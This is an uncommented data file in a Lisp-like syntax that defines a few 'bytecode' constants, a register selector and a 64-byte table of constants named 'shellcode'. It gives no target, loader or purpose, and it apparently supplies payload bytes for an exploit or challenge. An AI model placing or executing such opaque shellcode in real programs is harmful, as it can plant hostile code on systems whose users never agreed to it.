(= bytecode00 0xF0)
(= bytecode01 0x40)
(= bytecode02 0x00)
(= bytecode03 0x00)
(= bytecode04 0x00)
(= bytecode05 0xC1)
(= bytecode06 0xC9)
(= bytecode07 0xE0)
(= bytecode08 0xF8)
(= bytecode09 0xFB)
(= WhichReg 0b000)
(= shellcode00 0xA0)
(= shellcode01 0x8C)
(= shellcode02 0x1C)
(= shellcode03 0x29)
(= shellcode04 0xA1)
(= shellcode05 0xCC)
(= shellcode06 0x38)
(= shellcode07 0xFD)
(= shellcode08 0x8D)
(= shellcode09 0xF4)
(= shellcode0A 0x8E)
(= shellcode0B 0x59)
(= shellcode0C 0x86)
(= shellcode0D 0xB7)
(= shellcode0E 0xCA)
(= shellcode0F 0xFF)
(= shellcode10 0x33)
(= shellcode11 0x29)
(= shellcode12 0xD6)
(= shellcode13 0xE3)
(= shellcode14 0x6F)
(= shellcode15 0x4B)
(= shellcode16 0x19)
(= shellcode17 0x71)
(= shellcode18 0x5C)
(= shellcode19 0xBB)
(= shellcode1A 0x4E)
(= shellcode1B 0x90)
(= shellcode1C 0xC3)
(= shellcode1D 0xF7)
(= shellcode1E 0x41)
(= shellcode1F 0x9E)
(= shellcode20 0xA2)
(= shellcode21 0x1C)
(= shellcode22 0x22)
(= shellcode23 0xBF)
(= shellcode24 0x25)
(= shellcode25 0x0F)
(= shellcode26 0xFE)
(= shellcode27 0xA6)
(= shellcode28 0x81)
(= shellcode29 0x10)
(= shellcode2A 0x43)
(= shellcode2B 0x38)
(= shellcode2C 0x92)
(= shellcode2D 0x95)
(= shellcode2E 0x21)
(= shellcode2F 0x2B)
(= shellcode30 0xE3)
(= shellcode31 0xA6)
(= shellcode32 0xE9)
(= shellcode33 0xAC)
(= shellcode34 0x08)
(= shellcode35 0x4D)
(= shellcode36 0xBA)
(= shellcode37 0x08)
(= shellcode38 0x0B)
(= shellcode39 0xAB)
(= shellcode3A 0x22)
(= shellcode3B 0x84)
(= shellcode3C 0x6B)
(= shellcode3D 0x1F)
(= shellcode3E 0xAD)
(= shellcode3F 0x05)
